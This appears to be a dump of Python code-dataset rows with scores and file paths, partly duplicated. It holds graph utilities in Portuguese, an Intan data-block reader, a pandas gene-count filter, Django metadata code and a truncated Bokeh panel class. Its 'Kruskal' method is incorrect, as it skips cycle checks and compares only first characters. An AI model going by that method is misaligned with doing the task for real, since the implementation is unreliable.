if 'scriptspecificmetadata' in keys_to_update:
parsed_metadata.append({"scriptspecificmetadata":
metadata.pop('scriptspecificmetadata')})
@classmethod
def get_supported_element_names(cls):
elements = super(ScriptMetaData, cls).get_supported_element_names()
elements.append('ScriptSpecificMetadata')
return elements
def has_all_required_elements(self):
if self.get_required_missing_elements():
return False
return True
def get_required_missing_elements(self): # show missing required meta
missing_required_elements = super(ScriptMetaData, self).get_required_missing_elements()
if not self.program:
missing_required_elements.append('Script Language')
missing_required_elements.append('Programming Language Version')
else:
if not self.program.scriptLanguage:
missing_required_elements.append('Script Language')
if not self.program.languageVersion:
missing_required_elements.append('Programming Language Version')
return missing_required_elements
def update(self, metadata, user):
# overriding the base class update method for bulk update of metadata
from .forms import ScriptFormValidation
super(ScriptMetaData, self).update(metadata, user)
attribute_mappings = {'scriptspecificmetadata': 'program'}
with transaction.atomic():
# update/create non-repeatable element
for element_name in list(attribute_mappings.keys()):
for dict_item in metadata:
if element_name in dict_item:
validation_form = ScriptFormValidation(dict_item[element_name])
if not validation_form.is_valid():
err_string = self.get_form_errors_as_string(validation_form)
raise ValidationError(err_string)
element_property_name = attribute_mappings[element_name]
self.update_non_repeatable_element(element_name, metadata,
element_property_name)
break
from . import receivers # never delete this otherwise none of the receiver function will work | 0.495606 | 0.057705 |
class VerticeInvalidoException(Exception):
pass
class ArestaInvalidaException(Exception):
pass
class MatrizInvalidaException(Exception):
pass
class Grafo:
QTDE_MAX_SEPARADOR = 1
SEPARADOR_ARESTA = '-'
__maior_vertice = 0
def __init__(self, V=None, M=None):
'''
Constrói um objeto do tipo Grafo. Se nenhum parâmetro for passado, cria um Grafo vazio.
Se houver alguma aresta ou algum vértice inválido, uma exceção é lançada.
:param V: Uma lista dos vértices (ou nodos) do grafo.
:param V: Uma matriz de adjacência que guarda as arestas do grafo. Cada entrada da matriz tem um inteiro que indica a quantidade de arestas que ligam aqueles vértices
'''
if V == None:
V = list()
if M == None:
M = list()
for v in V:
if not (Grafo.verticeValido(v)):
raise VerticeInvalidoException('O vértice ' + v + ' é inválido')
if len(v) > self.__maior_vertice:
self.__maior_vertice = len(v)
self.N = list(V)
self.pesos = {}
if M == []:
for k in range(len(V)):
M.append(list())
for l in range(len(V)):
if k > l:
M[k].append('-')
else:
M[k].append(0)
if len(M) != len(V):
raise MatrizInvalidaException('A matriz passada como parâmetro não tem o tamanho correto')
for c in M:
if len(c) != len(V):
raise MatrizInvalidaException('A matriz passada como parâmetro não tem o tamanho correto')
for i in range(len(V)):
for j in range(len(V)):
'''
Verifica se os índices passados como parâmetro representam um elemento da matriz abaixo da diagonal principal.
Além disso, verifica se o referido elemento é um traço "-". Isso indica que a matriz é não direcionada e foi construída corretamente.
'''
if i > j and not (M[i][j] == '-'):
raise MatrizInvalidaException('A matriz não representa uma matriz não direcionada')
aresta = V[i] + Grafo.SEPARADOR_ARESTA + V[j]
if not (self.arestaValida(aresta)):
raise ArestaInvalidaException('A aresta ' + aresta + ' é inválida')
self.M = list(M)
def arestaValida(self, aresta=''):
'''
Verifica se uma aresta passada como parâmetro está dentro do padrão estabelecido.
Uma aresta é representada por um string com o formato a-b, onde:
a é um substring de aresta que é o nome de um vértice adjacente à aresta.
- é um caractere separador. Uma aresta só pode ter um único caractere como esse.
b é um substring de aresta que é o nome do outro vértice adjacente à aresta.
Além disso, uma aresta só é válida se conectar dois vértices existentes no grafo.
:param aresta: A aresta que se quer verificar se está no formato correto.
:return: Um valor booleano que indica se a aresta está no formato correto.
'''
# Não pode haver mais de um caractere separador
if aresta.count(Grafo.SEPARADOR_ARESTA) != Grafo.QTDE_MAX_SEPARADOR:
return False
# Índice do elemento separador
i_traco = aresta.index(Grafo.SEPARADOR_ARESTA)
# O caractere separador não pode ser o primeiro ou o último caractere da aresta
if i_traco == 0 or aresta[-1] == Grafo.SEPARADOR_ARESTA:
return False
if not (self.existeVertice(aresta[:i_traco])) or not (self.existeVertice(aresta[i_traco + 1:])):
return False
return True
@classmethod
def verticeValido(self, vertice: str):
'''
Verifica se um vértice passado como parâmetro está dentro do padrão estabelecido.
Um vértice é um string qualquer que não pode ser vazio e nem conter o caractere separador.
:param vertice: Um string que representa o vértice a ser analisado.
:return: Um valor booleano que indica se o vértice está no formato correto.
'''
return vertice != '' and vertice.count(Grafo.SEPARADOR_ARESTA) == 0
def existeVertice(self, vertice: str):
'''
Verifica se um vértice passado como parâmetro pertence ao grafo.
:param vertice: O vértice que deve ser verificado.
:return: Um valor booleano que indica se o vértice existe no grafo.
'''
return Grafo.verticeValido(vertice) and self.N.count(vertice) > 0
def __primeiro_vertice_aresta(self, a: str):
'''
Dada uma aresta no formato X-Y, retorna o vértice X
:param a: a aresta a ser analisada
:return: O primeiro vértice da aresta
'''
return a[0:a.index(Grafo.SEPARADOR_ARESTA)]
def __segundo_vertice_aresta(self, a: str):
'''
Dada uma aresta no formato X-Y, retorna o vértice Y
:param a: A aresta a ser analisada
:return: O segundo vértice da aresta
'''
return a[a.index(Grafo.SEPARADOR_ARESTA) + 1:]
def __indice_primeiro_vertice_aresta(self, a: str):
'''
Dada uma aresta no formato X-Y, retorna o índice do vértice X na lista de vértices
:param a: A aresta a ser analisada
:return: O índice do primeiro vértice da aresta na lista de vértices
'''
return self.N.index(self.__primeiro_vertice_aresta(a))
def __indice_segundo_vertice_aresta(self, a: str):
'''
Dada uma aresta no formato X-Y, retorna o índice do vértice Y na lista de vértices
:param a: A aresta a ser analisada
:return: O índice do segundo vértice da aresta na lista de vértices
'''
return self.N.index(self.__segundo_vertice_aresta(a))
def existeAresta(self, a: str):
'''
Verifica se uma aresta passada como parâmetro pertence ao grafo.
:param aresta: A aresta a ser verificada
:return: Um valor booleano que indica se a aresta existe no grafo.
'''
existe = False
if Grafo.arestaValida(self, a):
for i in range(len(self.M)):
for j in range(len(self.M)):
if self.M[self.__indice_primeiro_vertice_aresta(a)][self.__indice_segundo_vertice_aresta(a)]:
existe = True
return existe
def adicionaVertice(self, v):
'''
Inclui um vértice no grafo se ele estiver no formato correto.
:param v: O vértice a ser incluído no grafo.
:raises VerticeInvalidoException se o vértice já existe ou se ele não estiver no formato válido.
'''
if v in self.N:
raise VerticeInvalidoException('O vértice {} já existe'.format(v))
if self.verticeValido(v):
if len(v) > self.__maior_vertice:
self.__maior_vertice = len(v)
self.N.append(v) # Adiciona vértice na lista de vértices
self.M.append([]) # Adiciona a linha
for k in range(len(self.N)):
if k != len(self.N) - 1:
self.M[k].append(0) # adiciona os elementos da coluna do vértice
self.M[self.N.index(v)].append('-') # adiciona os elementos da linha do vértice
else:
self.M[self.N.index(v)].append(0) # adiciona um zero no último elemento da linha
else:
raise VerticeInvalidoException('O vértice ' + v + ' é inválido')
def adicionaAresta(self, a, peso):
'''
Adiciona uma aresta ao grafo no formato X-Y, onde X é o primeiro vértice e Y é o segundo vértice
:param a: a aresta no formato correto
:raise: lança uma exceção caso a aresta não estiver em um formato válido
'''
if self.arestaValida(a):
i_a1 = self.__indice_primeiro_vertice_aresta(a)
i_a2 = self.__indice_segundo_vertice_aresta(a)
if i_a1 < i_a2:
self.M[i_a1][i_a2] += 1
else:
self.M[i_a2][i_a1] += 1
else:
raise ArestaInvalidaException('A aresta {} é inválida'.format(a))
self.pesos[a] = peso
def remove_aresta(self, a):
'''
Remove uma aresta ao grafo no formato X-Y, onde X é o primeiro vértice e Y é o segundo vértice
:param a: a aresta no formato correto
:raise: lança uma exceção caso a aresta não estiver em um formato válido
'''
if self.arestaValida(a):
if self.existeAresta(a):
i_a1 = self.__indice_primeiro_vertice_aresta(a)
i_a2 = self.__indice_segundo_vertice_aresta(a)
if i_a1 < i_a2:
self.M[i_a1][i_a2] -= 1
else:
self.M[i_a2][i_a1] -= 1
else:
raise ArestaInvalidaException('A aresta {} é inválida'.format(a))
def vertices_nao_adjacentes(self):
not_adj = []
for i in range(len(self.N)):
for j in range(len(self.N)):
if self.M[i][j] == 0:
aresta = self.N[i] + "-" + self.N[j]
not_adj.append(aresta)
return not_adj
def ha_laco(self):
for i in range(len(self.M)):
if self.M[i][i] > 0:
return True
return False
def ha_paralelas(self):
for i in range(len(self.M)):
for j in range(len(self.M)):
if self.M[i][j] != '-' and self.M[i][j] > 1:
return True
return False
def arestas_sobre_vertice(self, vertice):
sobre_vertice = []
'''for i in range(len(self.N)):
for j in range(len(self.N)):
if self.N[i] == vertice and self.M[i][j] != '-'and i != j and self.M[i][j] > 0:
aresta = vertice+"-"+self.N[j]
sobre_vertice.append(aresta)
if self.N[j] == vertice and self.M[i][j] != '-' and i != j and self.M[i][j] > 0:
aresta = vertice+'-'+self.N[i]
sobre_vertice.append(aresta)
elif self.N[i] == vertice and self.M[i][j] != '-' and i == j and self.M[i][j] > 0:
aresta = vertice + '-' + self.N[i]
sobre_vertice.append(aresta)'''
index = 0
for i in range(len(self.N)):
if self.N[i] == vertice:
index = i
for i in range(len(self.N)):
if self.M[index][i] != '-' and self.M[index][i] > 0:
for j in range(self.M[index][i]):
aresta = vertice + "-" + self.N[i]
sobre_vertice.append(aresta)
if self.M[i][index] != '-' and self.M[i][index] > 0:
for j in range(self.M[i][index]):
aresta = vertice + "-" + self.N[i]
sobre_vertice.append(aresta)
return sobre_vertice
def eh_completo(self):
completo = True
for i in range(len(self.M)):
for j in range(len(self.M)):
if self.M[i][j] != '-' and self.M[i][j] >= 1 and i != j:
completo = True
elif self.M[i][j] != '-' and self.M[i][j] == 0 and i != j:
return False
return completo
def grau(self, vertice):
index = 1
soma = 0
soma_diagonal = 0
for i in range(len(self.N)):
for j in range(len(self.N)):
if self.N[i] == vertice or self.N[j] == vertice and i != j:
if self.M[i][j] != "-":
soma += self.M[i][j]
return soma
def Kruskal(self):
vertice_permanente = []
arvore = []
pesos = []
for i in self.pesos:
pesos.append(self.pesos[i])
c = 0
pesos.sort()
while len(pesos) != 0:
minimo = min(pesos)
for i in self.pesos:
if self.pesos[i] == minimo and i[0] not in vertice_permanente:
vertice_permanente.append(i[0])
arvore.append(i)
while minimo in pesos:
pesos.remove(minimo)
c += 1
return arvore
def __str__(self):
'''
Fornece uma representação do tipo String do grafo.
O String contém um sequência dos vértices separados por vírgula, seguido de uma sequência das arestas no formato padrão.
:return: Uma string que representa o grafo
'''
# Dá o espaçamento correto de acordo com o tamanho do string do maior vértice
espaco = ' ' * (self.__maior_vertice)
grafo_str = espaco + ' '
for v in range(len(self.N)):
grafo_str += self.N[v]
if v < (len(self.N) - 1): # Só coloca o espaço se não for o último vértice
grafo_str += ' '
grafo_str += '\n'
for l in range(len(self.M)):
grafo_str += self.N[l] + ' '
for c in range(len(self.M)):
grafo_str += str(self.M[l][c]) + ' '
grafo_str += '\n'
return grafo_str | Graphs/Kruskal algorithm/grafo_adj_nao_dir.py |
class VerticeInvalidoException(Exception):
pass
class ArestaInvalidaException(Exception):
pass
class MatrizInvalidaException(Exception):
pass
class Grafo:
QTDE_MAX_SEPARADOR = 1
SEPARADOR_ARESTA = '-'
__maior_vertice = 0
def __init__(self, V=None, M=None):
'''
Constrói um objeto do tipo Grafo. Se nenhum parâmetro for passado, cria um Grafo vazio.
Se houver alguma aresta ou algum vértice inválido, uma exceção é lançada.
:param V: Uma lista dos vértices (ou nodos) do grafo.
:param V: Uma matriz de adjacência que guarda as arestas do grafo. Cada entrada da matriz tem um inteiro que indica a quantidade de arestas que ligam aqueles vértices
'''
if V == None:
V = list()
if M == None:
M = list()
for v in V:
if not (Grafo.verticeValido(v)):
raise VerticeInvalidoException('O vértice ' + v + ' é inválido')
if len(v) > self.__maior_vertice:
self.__maior_vertice = len(v)
self.N = list(V)
self.pesos = {}
if M == []:
for k in range(len(V)):
M.append(list())
for l in range(len(V)):
if k > l:
M[k].append('-')
else:
M[k].append(0)
if len(M) != len(V):
raise MatrizInvalidaException('A matriz passada como parâmetro não tem o tamanho correto')
for c in M:
if len(c) != len(V):
raise MatrizInvalidaException('A matriz passada como parâmetro não tem o tamanho correto')
for i in range(len(V)):
for j in range(len(V)):
'''
Verifica se os índices passados como parâmetro representam um elemento da matriz abaixo da diagonal principal.
Além disso, verifica se o referido elemento é um traço "-". Isso indica que a matriz é não direcionada e foi construída corretamente.
'''
if i > j and not (M[i][j] == '-'):
raise MatrizInvalidaException('A matriz não representa uma matriz não direcionada')
aresta = V[i] + Grafo.SEPARADOR_ARESTA + V[j]
if not (self.arestaValida(aresta)):
raise ArestaInvalidaException('A aresta ' + aresta + ' é inválida')
self.M = list(M)
def arestaValida(self, aresta=''):
'''
Verifica se uma aresta passada como parâmetro está dentro do padrão estabelecido.
Uma aresta é representada por um string com o formato a-b, onde:
a é um substring de aresta que é o nome de um vértice adjacente à aresta.
- é um caractere separador. Uma aresta só pode ter um único caractere como esse.
b é um substring de aresta que é o nome do outro vértice adjacente à aresta.
Além disso, uma aresta só é válida se conectar dois vértices existentes no grafo.
:param aresta: A aresta que se quer verificar se está no formato correto.
:return: Um valor booleano que indica se a aresta está no formato correto.
'''
# Não pode haver mais de um caractere separador
if aresta.count(Grafo.SEPARADOR_ARESTA) != Grafo.QTDE_MAX_SEPARADOR:
return False
# Índice do elemento separador
i_traco = aresta.index(Grafo.SEPARADOR_ARESTA)
# O caractere separador não pode ser o primeiro ou o último caractere da aresta
if i_traco == 0 or aresta[-1] == Grafo.SEPARADOR_ARESTA:
return False
if not (self.existeVertice(aresta[:i_traco])) or not (self.existeVertice(aresta[i_traco + 1:])):
return False
return True
@classmethod
def verticeValido(self, vertice: str):
'''
Verifica se um vértice passado como parâmetro está dentro do padrão estabelecido.
Um vértice é um string qualquer que não pode ser vazio e nem conter o caractere separador.
:param vertice: Um string que representa o vértice a ser analisado.
:return: Um valor booleano que indica se o vértice está no formato correto.
'''
return vertice != '' and vertice.count(Grafo.SEPARADOR_ARESTA) == 0
def existeVertice(self, vertice: str):
'''
Verifica se um vértice passado como parâmetro pertence ao grafo.
:param vertice: O vértice que deve ser verificado.
:return: Um valor booleano que indica se o vértice existe no grafo.
'''
return Grafo.verticeValido(vertice) and self.N.count(vertice) > 0
def __primeiro_vertice_aresta(self, a: str):
'''
Dada uma aresta no formato X-Y, retorna o vértice X
:param a: a aresta a ser analisada
:return: O primeiro vértice da aresta
'''
return a[0:a.index(Grafo.SEPARADOR_ARESTA)]
def __segundo_vertice_aresta(self, a: str):
'''
Dada uma aresta no formato X-Y, retorna o vértice Y
:param a: A aresta a ser analisada
:return: O segundo vértice da aresta
'''
return a[a.index(Grafo.SEPARADOR_ARESTA) + 1:]
def __indice_primeiro_vertice_aresta(self, a: str):
'''
Dada uma aresta no formato X-Y, retorna o índice do vértice X na lista de vértices
:param a: A aresta a ser analisada
:return: O índice do primeiro vértice da aresta na lista de vértices
'''
return self.N.index(self.__primeiro_vertice_aresta(a))
def __indice_segundo_vertice_aresta(self, a: str):
'''
Dada uma aresta no formato X-Y, retorna o índice do vértice Y na lista de vértices
:param a: A aresta a ser analisada
:return: O índice do segundo vértice da aresta na lista de vértices
'''
return self.N.index(self.__segundo_vertice_aresta(a))
def existeAresta(self, a: str):
'''
Verifica se uma aresta passada como parâmetro pertence ao grafo.
:param aresta: A aresta a ser verificada
:return: Um valor booleano que indica se a aresta existe no grafo.
'''
existe = False
if Grafo.arestaValida(self, a):
for i in range(len(self.M)):
for j in range(len(self.M)):
if self.M[self.__indice_primeiro_vertice_aresta(a)][self.__indice_segundo_vertice_aresta(a)]:
existe = True
return existe
def adicionaVertice(self, v):
'''
Inclui um vértice no grafo se ele estiver no formato correto.
:param v: O vértice a ser incluído no grafo.
:raises VerticeInvalidoException se o vértice já existe ou se ele não estiver no formato válido.
'''
if v in self.N:
raise VerticeInvalidoException('O vértice {} já existe'.format(v))
if self.verticeValido(v):
if len(v) > self.__maior_vertice:
self.__maior_vertice = len(v)
self.N.append(v) # Adiciona vértice na lista de vértices
self.M.append([]) # Adiciona a linha
for k in range(len(self.N)):
if k != len(self.N) - 1:
self.M[k].append(0) # adiciona os elementos da coluna do vértice
self.M[self.N.index(v)].append('-') # adiciona os elementos da linha do vértice
else:
self.M[self.N.index(v)].append(0) # adiciona um zero no último elemento da linha
else:
raise VerticeInvalidoException('O vértice ' + v + ' é inválido')
def adicionaAresta(self, a, peso):
'''
Adiciona uma aresta ao grafo no formato X-Y, onde X é o primeiro vértice e Y é o segundo vértice
:param a: a aresta no formato correto
:raise: lança uma exceção caso a aresta não estiver em um formato válido
'''
if self.arestaValida(a):
i_a1 = self.__indice_primeiro_vertice_aresta(a)
i_a2 = self.__indice_segundo_vertice_aresta(a)
if i_a1 < i_a2:
self.M[i_a1][i_a2] += 1
else:
self.M[i_a2][i_a1] += 1
else:
raise ArestaInvalidaException('A aresta {} é inválida'.format(a))
self.pesos[a] = peso
def remove_aresta(self, a):
'''
Remove uma aresta ao grafo no formato X-Y, onde X é o primeiro vértice e Y é o segundo vértice
:param a: a aresta no formato correto
:raise: lança uma exceção caso a aresta não estiver em um formato válido
'''
if self.arestaValida(a):
if self.existeAresta(a):
i_a1 = self.__indice_primeiro_vertice_aresta(a)
i_a2 = self.__indice_segundo_vertice_aresta(a)
if i_a1 < i_a2:
self.M[i_a1][i_a2] -= 1
else:
self.M[i_a2][i_a1] -= 1
else:
raise ArestaInvalidaException('A aresta {} é inválida'.format(a))
def vertices_nao_adjacentes(self):
not_adj = []
for i in range(len(self.N)):
for j in range(len(self.N)):
if self.M[i][j] == 0:
aresta = self.N[i] + "-" + self.N[j]
not_adj.append(aresta)
return not_adj
def ha_laco(self):
for i in range(len(self.M)):
if self.M[i][i] > 0:
return True
return False
def ha_paralelas(self):
for i in range(len(self.M)):
for j in range(len(self.M)):
if self.M[i][j] != '-' and self.M[i][j] > 1:
return True
return False
def arestas_sobre_vertice(self, vertice):
sobre_vertice = []
'''for i in range(len(self.N)):
for j in range(len(self.N)):
if self.N[i] == vertice and self.M[i][j] != '-'and i != j and self.M[i][j] > 0:
aresta = vertice+"-"+self.N[j]
sobre_vertice.append(aresta)
if self.N[j] == vertice and self.M[i][j] != '-' and i != j and self.M[i][j] > 0:
aresta = vertice+'-'+self.N[i]
sobre_vertice.append(aresta)
elif self.N[i] == vertice and self.M[i][j] != '-' and i == j and self.M[i][j] > 0:
aresta = vertice + '-' + self.N[i]
sobre_vertice.append(aresta)'''
index = 0
for i in range(len(self.N)):
if self.N[i] == vertice:
index = i
for i in range(len(self.N)):
if self.M[index][i] != '-' and self.M[index][i] > 0:
for j in range(self.M[index][i]):
aresta = vertice + "-" + self.N[i]
sobre_vertice.append(aresta)
if self.M[i][index] != '-' and self.M[i][index] > 0:
for j in range(self.M[i][index]):
aresta = vertice + "-" + self.N[i]
sobre_vertice.append(aresta)
return sobre_vertice
def eh_completo(self):
completo = True
for i in range(len(self.M)):
for j in range(len(self.M)):
if self.M[i][j] != '-' and self.M[i][j] >= 1 and i != j:
completo = True
elif self.M[i][j] != '-' and self.M[i][j] == 0 and i != j:
return False
return completo
def grau(self, vertice):
index = 1
soma = 0
soma_diagonal = 0
for i in range(len(self.N)):
for j in range(len(self.N)):
if self.N[i] == vertice or self.N[j] == vertice and i != j:
if self.M[i][j] != "-":
soma += self.M[i][j]
return soma
def Kruskal(self):
vertice_permanente = []
arvore = []
pesos = []
for i in self.pesos:
pesos.append(self.pesos[i])
c = 0
pesos.sort()
while len(pesos) != 0:
minimo = min(pesos)
for i in self.pesos:
if self.pesos[i] == minimo and i[0] not in vertice_permanente:
vertice_permanente.append(i[0])
arvore.append(i)
while minimo in pesos:
pesos.remove(minimo)
c += 1
return arvore
def __str__(self):
'''
Fornece uma representação do tipo String do grafo.
O String contém um sequência dos vértices separados por vírgula, seguido de uma sequência das arestas no formato padrão.
:return: Uma string que representa o grafo
'''
# Dá o espaçamento correto de acordo com o tamanho do string do maior vértice
espaco = ' ' * (self.__maior_vertice)
grafo_str = espaco + ' '
for v in range(len(self.N)):
grafo_str += self.N[v]
if v < (len(self.N) - 1): # Só coloca o espaço se não for o último vértice
grafo_str += ' '
grafo_str += '\n'
for l in range(len(self.M)):
grafo_str += self.N[l] + ' '
for c in range(len(self.M)):
grafo_str += str(self.M[l][c]) + ' '
grafo_str += '\n'
return grafo_str | 0.434221 | 0.441553 |
import sys, struct
import numpy as np
def read_one_data_block(data, header, indices, fid):
"""Reads one 60-sample data block from fid into data, at the location indicated by indices."""
# In version 1.2, we moved from saving timestamps as unsigned
# integers to signed integers to accommodate negative (adjusted)
# timestamps for pretrigger data['
if (header['version']['major'] == 1 and header['version']['minor'] >= 2) or (header['version']['major'] > 1):
data['t_amplifier'][indices['amplifier']:(indices['amplifier']+60)] = np.array(struct.unpack('<' + 'i' *60, fid.read(240)))
else:
data['t_amplifier'][indices['amplifier']:(indices['amplifier']+60)] = np.array(struct.unpack('<' + 'I' *60, fid.read(240)))
if header['num_amplifier_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=60 * header['num_amplifier_channels'])
data['amplifier_data'][range(header['num_amplifier_channels']), indices['amplifier']:(indices['amplifier']+60)] = tmp.reshape(header['num_amplifier_channels'], 60)
if header['num_aux_input_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=15 * header['num_aux_input_channels'])
data['aux_input_data'][range(header['num_aux_input_channels']), indices['aux_input']:(indices['aux_input']+15)] = tmp.reshape(header['num_aux_input_channels'], 15)
if header['num_supply_voltage_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=1 * header['num_supply_voltage_channels'])
data['supply_voltage_data'][range(header['num_supply_voltage_channels']), indices['supply_voltage']:(indices['supply_voltage']+1)] = tmp.reshape(header['num_supply_voltage_channels'], 1)
if header['num_temp_sensor_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=1 * header['num_temp_sensor_channels'])
data['temp_sensor_data'][range(header['num_temp_sensor_channels']), indices['supply_voltage']:(indices['supply_voltage']+1)] = tmp.reshape(header['num_temp_sensor_channels'], 1)
if header['num_board_adc_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=60 * header['num_board_adc_channels'])
data['board_adc_data'][range(header['num_board_adc_channels']), indices['board_adc']:(indices['board_adc']+60)] = tmp.reshape(header['num_board_adc_channels'], 60)
if header['num_board_dig_in_channels'] > 0:
data['board_dig_in_raw'][indices['board_dig_in']:(indices['board_dig_in']+60)] = np.array(struct.unpack('<' + 'H' *60, fid.read(120)))
if header['num_board_dig_out_channels'] > 0:
data['board_dig_out_raw'][indices['board_dig_out']:(indices['board_dig_out']+60)] = np.array(struct.unpack('<' + 'H' *60, fid.read(120))) | pyspike/intanutil/read_one_data_block.py |
import sys, struct
import numpy as np
def read_one_data_block(data, header, indices, fid):
"""Reads one 60-sample data block from fid into data, at the location indicated by indices."""
# In version 1.2, we moved from saving timestamps as unsigned
# integers to signed integers to accommodate negative (adjusted)
# timestamps for pretrigger data['
if (header['version']['major'] == 1 and header['version']['minor'] >= 2) or (header['version']['major'] > 1):
data['t_amplifier'][indices['amplifier']:(indices['amplifier']+60)] = np.array(struct.unpack('<' + 'i' *60, fid.read(240)))
else:
data['t_amplifier'][indices['amplifier']:(indices['amplifier']+60)] = np.array(struct.unpack('<' + 'I' *60, fid.read(240)))
if header['num_amplifier_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=60 * header['num_amplifier_channels'])
data['amplifier_data'][range(header['num_amplifier_channels']), indices['amplifier']:(indices['amplifier']+60)] = tmp.reshape(header['num_amplifier_channels'], 60)
if header['num_aux_input_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=15 * header['num_aux_input_channels'])
data['aux_input_data'][range(header['num_aux_input_channels']), indices['aux_input']:(indices['aux_input']+15)] = tmp.reshape(header['num_aux_input_channels'], 15)
if header['num_supply_voltage_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=1 * header['num_supply_voltage_channels'])
data['supply_voltage_data'][range(header['num_supply_voltage_channels']), indices['supply_voltage']:(indices['supply_voltage']+1)] = tmp.reshape(header['num_supply_voltage_channels'], 1)
if header['num_temp_sensor_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=1 * header['num_temp_sensor_channels'])
data['temp_sensor_data'][range(header['num_temp_sensor_channels']), indices['supply_voltage']:(indices['supply_voltage']+1)] = tmp.reshape(header['num_temp_sensor_channels'], 1)
if header['num_board_adc_channels'] > 0:
tmp = np.fromfile(fid, dtype='uint16', count=60 * header['num_board_adc_channels'])
data['board_adc_data'][range(header['num_board_adc_channels']), indices['board_adc']:(indices['board_adc']+60)] = tmp.reshape(header['num_board_adc_channels'], 60)
if header['num_board_dig_in_channels'] > 0:
data['board_dig_in_raw'][indices['board_dig_in']:(indices['board_dig_in']+60)] = np.array(struct.unpack('<' + 'H' *60, fid.read(120)))
if header['num_board_dig_out_channels'] > 0:
data['board_dig_out_raw'][indices['board_dig_out']:(indices['board_dig_out']+60)] = np.array(struct.unpack('<' + 'H' *60, fid.read(120))) | 0.385837 | 0.29146 |
import pandas as pd
def exclude_the_min_row_sum(feature_count_table,
feature_count_start_column, feature_count_end_column, min_row, output_file):
feature_count_table_df = pd.read_table(feature_count_table)
matrix_value = _extract_value_matrix(feature_count_table_df,
feature_count_start_column, feature_count_end_column)
colum_with_gene_name = _extract_gene_matrix(feature_count_table_df)
attribute_matrix = _extract_attributes(feature_count_table_df, feature_count_start_column)
min_row_sum(matrix_value, attribute_matrix, colum_with_gene_name, min_row, output_file)
def _extract_value_matrix(feature_count_table_df, feature_count_start_column,
feature_count_end_column):
return feature_count_table_df.iloc[:, feature_count_start_column:(
feature_count_end_column)]
def _extract_gene_matrix(feature_count_table_df):
gene_column = feature_count_table_df[list(filter(
lambda col: col.startswith("Attributes"), feature_count_table_df.columns))]
return gene_column
def _extract_attributes(feature_count_table_df,
feature_count_start_column):
return feature_count_table_df.iloc[:, : feature_count_start_column]
def min_row_sum(value_matrix, attribute_matrix, gene_column, min_row, output_file):
gene_table_final = []
combined_df_ext = pd.concat([attribute_matrix, value_matrix], axis=1)
summed_values = value_matrix.sum(axis=1)
combined_df = pd.concat([gene_column, summed_values], axis=1)
combined_df.columns = ['Attributes', 'sum_of_values']
selected_df = combined_df[~(combined_df['sum_of_values'] <= min_row)]
selected_df.reset_index(drop=True, inplace=True)
my_keys = selected_df['Attributes'].tolist()
for index, row in combined_df_ext.iterrows():
gene = row["Attributes"]
if gene in my_keys:
gene_table_final.append(row)
df_with_min_row_samples = pd.DataFrame(gene_table_final)
df_with_min_row_samples.reset_index(drop=True, inplace=True)
df_with_min_row_samples.to_csv(output_file, sep='\t', index=0) | graditudelib/min_row_sum.py | import pandas as pd
def exclude_the_min_row_sum(feature_count_table,
feature_count_start_column, feature_count_end_column, min_row, output_file):
feature_count_table_df = pd.read_table(feature_count_table)
matrix_value = _extract_value_matrix(feature_count_table_df,
feature_count_start_column, feature_count_end_column)
colum_with_gene_name = _extract_gene_matrix(feature_count_table_df)
attribute_matrix = _extract_attributes(feature_count_table_df, feature_count_start_column)
min_row_sum(matrix_value, attribute_matrix, colum_with_gene_name, min_row, output_file)
def _extract_value_matrix(feature_count_table_df, feature_count_start_column,
feature_count_end_column):
return feature_count_table_df.iloc[:, feature_count_start_column:(
feature_count_end_column)]
def _extract_gene_matrix(feature_count_table_df):
gene_column = feature_count_table_df[list(filter(
lambda col: col.startswith("Attributes"), feature_count_table_df.columns))]
return gene_column
def _extract_attributes(feature_count_table_df,
feature_count_start_column):
return feature_count_table_df.iloc[:, : feature_count_start_column]
def min_row_sum(value_matrix, attribute_matrix, gene_column, min_row, output_file):
gene_table_final = []
combined_df_ext = pd.concat([attribute_matrix, value_matrix], axis=1)
summed_values = value_matrix.sum(axis=1)
combined_df = pd.concat([gene_column, summed_values], axis=1)
combined_df.columns = ['Attributes', 'sum_of_values']
selected_df = combined_df[~(combined_df['sum_of_values'] <= min_row)]
selected_df.reset_index(drop=True, inplace=True)
my_keys = selected_df['Attributes'].tolist()
for index, row in combined_df_ext.iterrows():
gene = row["Attributes"]
if gene in my_keys:
gene_table_final.append(row)
df_with_min_row_samples = pd.DataFrame(gene_table_final)
df_with_min_row_samples.reset_index(drop=True, inplace=True)
df_with_min_row_samples.to_csv(output_file, sep='\t', index=0) | 0.371935 | 0.338842 |
import abc
from bokeh.document import Document
from bokeh.io import export_png, export_svgs
from bokeh.layouts import column, gridplot, row
from bokeh.models import Spacer
class BasePanel(object):
""" Base class for all panels. """
def __init__(self):
self.layout = None
self.doc = None
self.handlers = None
self.glyph_map = None
self.figure_map = None
self.figures = None
# TODO: improve
self.added_figures = []
self.added_overlays = []
self.added_overlay_figures = []
self.added_annotations = []
self.added_annotation_figures = []
self.modifiers = []
@abc.abstractmethod
def make_layout(self):
""" Make the layout. """
@abc.abstractmethod
def show(self, *args, **kwargs):
""" Show the layout. """
def _export(self, func, backend, filename):
""" Export. """
backends = []
for f in self.figures:
if hasattr(f, "output_backend"):
backends.append(f.output_backend)
f.output_backend = backend
func(self.layout, filename=filename)
for f in self.figures:
if hasattr(f, "output_backend"):
f.output_backend = backends.pop(0)
def export(self, filename, mode="auto"):
""" Export the layout as as png or svg file.
Parameters
----------
filename : str
The path of the exported file.
mode : 'auto', 'png' or 'svg', default 'auto'
Whether to export as png or svg. Note that multi-figure layouts
will be split into individual files for each figure in the svg
mode. 'auto' will try to determine the mode automatically from
the file extension.
"""
if self.layout is None:
self.make_layout()
if mode == "auto":
mode = filename.split(".")[-1]
if mode not in ("png", "svg"):
raise ValueError(
"Could not determine mode from file extension"
)
if mode == "png":
# TODO: TEST
for c in self.layout.children:
if hasattr(c, "toolbar_location"):
c.toolbar_location = None
self._export(export_png, "canvas", filename)
# TODO: TEST
for c in self.layout.children:
if hasattr(c, "toolbar_location"):
c.toolbar_location = self.toolbar_location
elif mode == "svg":
